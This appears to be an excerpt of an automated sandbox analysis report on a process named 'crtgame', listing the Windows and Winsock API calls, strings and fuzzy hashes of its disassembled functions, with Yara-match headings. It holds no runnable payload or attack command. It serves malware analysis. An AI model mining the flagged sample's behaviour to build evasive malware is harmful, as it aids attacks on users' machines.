                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C22699
                                                                              • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C226AD
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02C226BD
                                                                              • GetLastError.KERNEL32(?,74DEDFB0), ref: 02C226C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                              • String ID:
                                                                              • API String ID: 1213838671-0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24533
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                              • htons.WS2_32(?), ref: 02C24594
                                                                              • htonl.WS2_32(?), ref: 02C245B7
                                                                              • htonl.WS2_32(00000000), ref: 02C245BE
                                                                              • htons.WS2_32(00000000), ref: 02C24672
                                                                              • _sprintf.LIBCMT ref: 02C24688
                                                                              • htons.WS2_32(?), ref: 02C245DB
                                                                                • Part of subcall function 02C290C0: __EH_prolog.LIBCMT ref: 02C290C5
                                                                                • Part of subcall function 02C290C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C29140
                                                                                • Part of subcall function 02C290C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C2915E
                                                                                • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                • Part of subcall function 02C2D87F: __EH_prolog.LIBCMT ref: 02C2D884
                                                                              • htonl.WS2_32(?), ref: 02C248A7
                                                                              • htonl.WS2_32(00000000), ref: 02C248AE
                                                                              • htonl.WS2_32(00000000), ref: 02C248F3
                                                                              • htonl.WS2_32(00000000), ref: 02C248FA
                                                                              • htons.WS2_32(?), ref: 02C2491A
                                                                              • htons.WS2_32(?), ref: 02C24924
                                                                              • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
                                                                              • String ID:
                                                                              • API String ID: 725951905-0
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C23428
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C2346B
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C23472
                                                                              • GetLastError.KERNEL32 ref: 02C23486
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C234D7
                                                                              • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C234ED
                                                                              • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C23518
                                                                              • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                              • String ID: CancelIoEx$KERNEL32
                                                                              • API String ID: 2902213904-434325024
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310B0
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C310C5
                                                                              • ResetEvent.KERNEL32(00000000), ref: 02C310CF
                                                                              • CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C31104
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,A5B40990), ref: 02C3117A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C3118F
                                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                                              • String ID:
                                                                              • API String ID: 1285874450-0
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C220AC
                                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C220CD
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C220D8
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C2213E
                                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C2217A
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C22187
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221A6
                                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                              • String ID:
                                                                              • API String ID: 1171374749-0
                                                                              APIs
                                                                                • Part of subcall function 02C318D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C3112E,?,?), ref: 02C318FF
                                                                                • Part of subcall function 02C318D0: CloseHandle.KERNEL32(00000000,?,?,02C3112E,?,?), ref: 02C31914
                                                                                • Part of subcall function 02C318D0: SetEvent.KERNEL32(00000000,02C3112E,?,?), ref: 02C31927
                                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310B0
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C310C5
                                                                              • ResetEvent.KERNEL32(00000000), ref: 02C310CF
                                                                              • CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C31104
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C31135
                                                                                • Part of subcall function 02C33F5A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C3359C,?,02C50F6C,00000000,00000001), ref: 02C33FAF
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,A5B40990), ref: 02C3117A
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C3118F
                                                                                • Part of subcall function 02C31610: GetCurrentProcessId.KERNEL32(?), ref: 02C31669
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,A5B40990), ref: 02C3119F
                                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2227236058-0
                                                                              APIs
                                                                              • __init_pointers.LIBCMT ref: 02C35794
                                                                                • Part of subcall function 02C37F02: RtlEncodePointer.NTDLL(00000000), ref: 02C37F05
                                                                                • Part of subcall function 02C37F02: __initp_misc_winsig.LIBCMT ref: 02C37F20
                                                                                • Part of subcall function 02C37F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C38C81
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C38C95
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C38CA8
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C38CBB
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C38CCE
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C38CE1
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C38CF4
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C38D07
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C38D1A
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C38D2D
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C38D40
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C38D53
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C38D66
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C38D79
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C38D8C
                                                                                • Part of subcall function 02C37F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C38D9F
                                                                              • __mtinitlocks.LIBCMT ref: 02C35799
                                                                              • __mtterm.LIBCMT ref: 02C357A2
                                                                                • Part of subcall function 02C3580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C3833A
                                                                                • Part of subcall function 02C3580A: RtlDeleteCriticalSection.NTDLL(02C53978), ref: 02C38363
                                                                              • __calloc_crt.LIBCMT ref: 02C357C7
                                                                              • __initptd.LIBCMT ref: 02C357E9
                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C357F0
                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                              • String ID:
                                                                              • API String ID: 1500305132-0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C32E73,00000000), ref: 02C32EDB
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C32EE2
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02C32EEE
                                                                              • RtlDecodePointer.NTDLL(00000001), ref: 02C32F0B
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 3489934621-340411864
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C32EB0), ref: 02C32FB0
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C32FB7
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02C32FC2
                                                                              • RtlDecodePointer.NTDLL(02C32EB0), ref: 02C32FDD
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(00000025,A5B40990,?,?,?,?,00000000,02C464B8,000000FF,02C31BCA), ref: 02C3196A
                                                                              • TlsSetValue.KERNEL32(00000025,02C31BCA,?,?,00000000), ref: 02C319D7
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C31A01
                                                                              • HeapFree.KERNEL32(00000000), ref: 02C31A04
                                                                              • API ID: HeapValue$FreeProcess
                                                                              • String ID:
                                                                              • API String ID: 1812714009-0
                                                                              APIs
                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 02C45190
                                                                              • __FindPESection.LIBCMT ref: 02C451AA
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                              • String ID:
                                                                              • API String ID: 876702719-0
                                                                              • Opcode ID: 076b3b6d8b8d1331e1c616cfd14fb17f27fbd5847ae6f578b26cc64949fbe31c
                                                                              • Instruction ID: 885b199dbf71d151fb56a13adc7dbaa64aed464c231621f53cb8b3a3e09f5382
                                                                              • Opcode Fuzzy Hash: 076b3b6d8b8d1331e1c616cfd14fb17f27fbd5847ae6f578b26cc64949fbe31c
                                                                              • Instruction Fuzzy Hash: 7CA1B271E007158FCB25CF58D8807AEB7B5FB94398F944A69DC05A7390EB31E985CB90
                                                                              APIs
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C21CB1
                                                                              • CloseHandle.KERNEL32(?), ref: 02C21CBA
                                                                              • InterlockedExchangeAdd.KERNEL32(02C574EC,00000000), ref: 02C21CC6
                                                                              • TerminateThread.KERNEL32(?,00000000), ref: 02C21CD4
                                                                              • QueueUserAPC.KERNEL32(02C21E7C,?,00000000), ref: 02C21CE1
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C21CEC
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                              • String ID:
                                                                              • API String ID: 1946104331-0
                                                                              • Opcode ID: e890f3f3ac1e3ac5f0d9ae4c881ca3189c662f747f9b5e3f5a687d2dd79ba7d1
                                                                              • Instruction ID: c3caa9ba97f1569ec745306a5e7668e6a2bf451934f95152d73001ecc4925efa
                                                                              • Opcode Fuzzy Hash: e890f3f3ac1e3ac5f0d9ae4c881ca3189c662f747f9b5e3f5a687d2dd79ba7d1
                                                                              • Instruction Fuzzy Hash: C3F0A439941224BFDB204B96DD0DD57FFFCEB85720700475AF92A82190DBB0A918CBA0
                                                                              APIs
                                                                              • std::exception::exception.LIBCMT ref: 02C3137F
                                                                                • Part of subcall function 02C31ED3: std::exception::_Copy_str.LIBCMT ref: 02C31EEC
                                                                                • Part of subcall function 02C30750: __CxxThrowException@8.LIBCMT ref: 02C307AE
                                                                              • std::exception::exception.LIBCMT ref: 02C313DE
                                                                              Strings
                                                                              • $, xrefs: 02C313E3
                                                                              • boost unique_lock owns already the mutex, xrefs: 02C313CD
                                                                              • boost unique_lock has no mutex, xrefs: 02C3136E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                              • API String ID: 2140441600-46888669
                                                                              • Opcode ID: a91db20b86bb4b19b2544f5b670546158bf5e611f727ce6acaac4d6dc5c1b8d6
                                                                              • Instruction ID: 8c219c0dd555666b8491c5a8311cc894133630aaab7d26b4a4b650c5d9717e94
                                                                              • Opcode Fuzzy Hash: a91db20b86bb4b19b2544f5b670546158bf5e611f727ce6acaac4d6dc5c1b8d6
                                                                              • Instruction Fuzzy Hash: F72124B25087809FD721DF24C54474BBBE9AF89B08F404E5DF4A587280DBB5D808CF82
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                              • GetLastError.KERNEL32 ref: 02C2237A
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID: pqcs
                                                                              • API String ID: 1619523792-2559862021
                                                                              • Opcode ID: 966f8eda82e61e6b4e2cca8821a620586143b747801156e0f1e150437ef73e19
                                                                              • Instruction ID: 53a5b0e69fd2c43413c98185e24b1875fa2c53374c5b46981542fe796d7feb5b
                                                                              • Opcode Fuzzy Hash: 966f8eda82e61e6b4e2cca8821a620586143b747801156e0f1e150437ef73e19
                                                                              • Instruction Fuzzy Hash: 6DF05B75A413146FD720AF749909B6B77ECDB41601F400A55F90DD2140FB71E6189BD1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24035
                                                                              • GetProcessHeap.KERNEL32(00000000,02C2A5C3,?,?,?,?,?,02C2A5C3), ref: 02C24042
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C24049
                                                                              • std::exception::exception.LIBCMT ref: 02C24063
                                                                                • Part of subcall function 02C2A053: __EH_prolog.LIBCMT ref: 02C2A058
                                                                                • Part of subcall function 02C2A053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C2A067
                                                                                • Part of subcall function 02C2A053: __CxxThrowException@8.LIBCMT ref: 02C2A086
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3112922283-2104205924
                                                                              • Opcode ID: b825a51147c6e3dc5ba9ea11c31792ef791dcb828c2ce2810b428cfe3616c47f
                                                                              • Instruction ID: a633d8b7b3bf1e9313431070f087905b973801d98134eb360af95e6ef2324c7e
                                                                              • Opcode Fuzzy Hash: b825a51147c6e3dc5ba9ea11c31792ef791dcb828c2ce2810b428cfe3616c47f
                                                                              • Instruction Fuzzy Hash: 92F082B1E442099FDB10EFE0D808BEFB778FB04301F004555E915A2240DF7552188FD1
                                                                              APIs
                                                                                • Part of subcall function 02C31450: CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C314A1
                                                                                • Part of subcall function 02C31450: WaitForSingleObject.KERNEL32(?,000000FF,A5B40990,?,?,?,?,A5B40990,02C31423,A5B40990), ref: 02C314B8
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3171E
                                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C3173E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C31777
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C317CB
                                                                              • SetEvent.KERNEL32(?), ref: 02C317D2
                                                                                • Part of subcall function 02C2418C: CloseHandle.KERNEL32(00000000,?,02C31705), ref: 02C241B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 4166353394-0
                                                                              • Opcode ID: 687f2a3ee84387ebc2d80e437d40d4b30a66e10f4f72196d0767905f09ad1492
                                                                              • Instruction ID: e0301c784dc188ee809228e3ec7dc43fc3b084e6e424832d973ff96d0b06e229
                                                                              • Opcode Fuzzy Hash: 687f2a3ee84387ebc2d80e437d40d4b30a66e10f4f72196d0767905f09ad1492
                                                                              • Instruction Fuzzy Hash: E041E1716003158FDB269F29CC80B27B7E8EF86724F1C0A68EC1CDB295D774D9058B95
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2DA89
                                                                                • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB08
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C2DB24
                                                                              • InterlockedIncrement.KERNEL32(02C55170), ref: 02C2DB49
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C2DB5E
                                                                                • Part of subcall function 02C227F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C2284E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                              • String ID:
                                                                              • API String ID: 1578506061-0
                                                                              • Opcode ID: 01b1e1a49803d93dc878cd084e92a14ab5f9b5764c2cf69b609b64a2d6d24cc8
                                                                              • Instruction ID: 378c516ed60d45307a2ef259b2c2cc90027ec45e612958570e2d6c78bb60e6d7
                                                                              • Opcode Fuzzy Hash: 01b1e1a49803d93dc878cd084e92a14ab5f9b5764c2cf69b609b64a2d6d24cc8
                                                                              • Instruction Fuzzy Hash: 103139B19053149FCB10DF69C444AAABBF8BF58310F14455AE849D7641EB74A608CFA0
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C22A3B
                                                                              • closesocket.WS2_32(?), ref: 02C22A42
                                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C22A89
                                                                              • WSASetLastError.WS2_32(00000000), ref: 02C22A97
                                                                              • closesocket.WS2_32(?), ref: 02C22A9E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                                              • String ID:
                                                                              • API String ID: 1561005644-0
                                                                              • Opcode ID: a80aac80367733a8bbb4779d0c0e4b2b284604e2feb373b10b6d44db2eedd625
                                                                              • Instruction ID: 14b6d9f3b7f04ad5e9ca784260e950ebd43d7ea295697b523b6fdbceffad09d7
                                                                              • Opcode Fuzzy Hash: a80aac80367733a8bbb4779d0c0e4b2b284604e2feb373b10b6d44db2eedd625
                                                                              • Instruction Fuzzy Hash: D421FB77940215EBEB34ABB8884476AB7E9EF84315F104969EC45C3641FF708A48C7A1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C221DA
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221ED
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C22224
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C22237
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C22261
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1856819132-0
                                                                              • Opcode ID: ac539ff56b2426fa02cc5684ac28d57e6e6bc34b309b44cdc764d49d28de821f
                                                                              • Instruction ID: 6e04eb053808103aea37fa3b65388761af8e40569ec2c0341a0ca760b63edfa8
                                                                              • Opcode Fuzzy Hash: ac539ff56b2426fa02cc5684ac28d57e6e6bc34b309b44cdc764d49d28de821f
                                                                              • Instruction Fuzzy Hash: A0117F72D41228DBCF15DFA5E8046AEFFBAFF44320F004A1AE815E2260DB718658DBC1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2229D
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C222B0
                                                                              • TlsGetValue.KERNEL32 ref: 02C222E7
                                                                              • TlsSetValue.KERNEL32(?), ref: 02C22300
                                                                              • TlsSetValue.KERNEL32(?,?,?), ref: 02C2231C
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1856819132-0
                                                                              • Opcode ID: bcc6751ca129b484f443ec6ed710f6b996e0bfde4d40860e6a7acaa1e80c5f14
                                                                              • Instruction ID: 77837fcc6ddaea1ac9ad8801fdc30cf10be6d0ac92b4944fc87102e99b8bf963
                                                                              • Opcode Fuzzy Hash: bcc6751ca129b484f443ec6ed710f6b996e0bfde4d40860e6a7acaa1e80c5f14
                                                                              • Instruction Fuzzy Hash: A9115E76D102289BCF15DFA5D8046AEFFBAFF44310F00452AE804A3220DB719A54DFD1
                                                                              APIs
                                                                                • Part of subcall function 02C2AAEE: __EH_prolog.LIBCMT ref: 02C2AAF3
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C2B6B8
                                                                                • Part of subcall function 02C33F5A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C3359C,?,02C50F6C,00000000,00000001), ref: 02C33FAF
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B6CE
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C2B6E1
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B6F1
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2B6FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2725315915-0
                                                                              • Opcode ID: 2e2e770dbae0014c1503229b6bef33db700039e0bb7ecb5266fbe9be2d5b7cff
                                                                              • Instruction ID: aff4b6186e903ee36e5034c1e6645441faf4be9161b05428d4656e22ad4fb66e
                                                                              • Opcode Fuzzy Hash: 2e2e770dbae0014c1503229b6bef33db700039e0bb7ecb5266fbe9be2d5b7cff
                                                                              • Instruction Fuzzy Hash: B10181B6A40214AFDB10DBA4DD89F97B7EDEF04319F004A64F616D7290DB61E8188BA0
                                                                              APIs
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
Memory Dump Source
• Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
APIs
• InterlockedIncrement.KERNEL32(?), ref: 02C21ED2
• PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C21EEA
• RtlEnterCriticalSection.NTDLL(?), ref: 02C21EF9
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C21F0E
• RtlLeaveCriticalSection.NTDLL(?), ref: 02C21F15
Similarity
• API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
APIs
• WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C230C3
• WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C23102
• _memcmp.LIBCMT ref: 02C23141
Similarity
• API ID: AddressErrorLastString_memcmp
• String ID: 255.255.255.255
APIs
• __EH_prolog.LIBCMT ref: 02C21F5B
• CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C21FC5
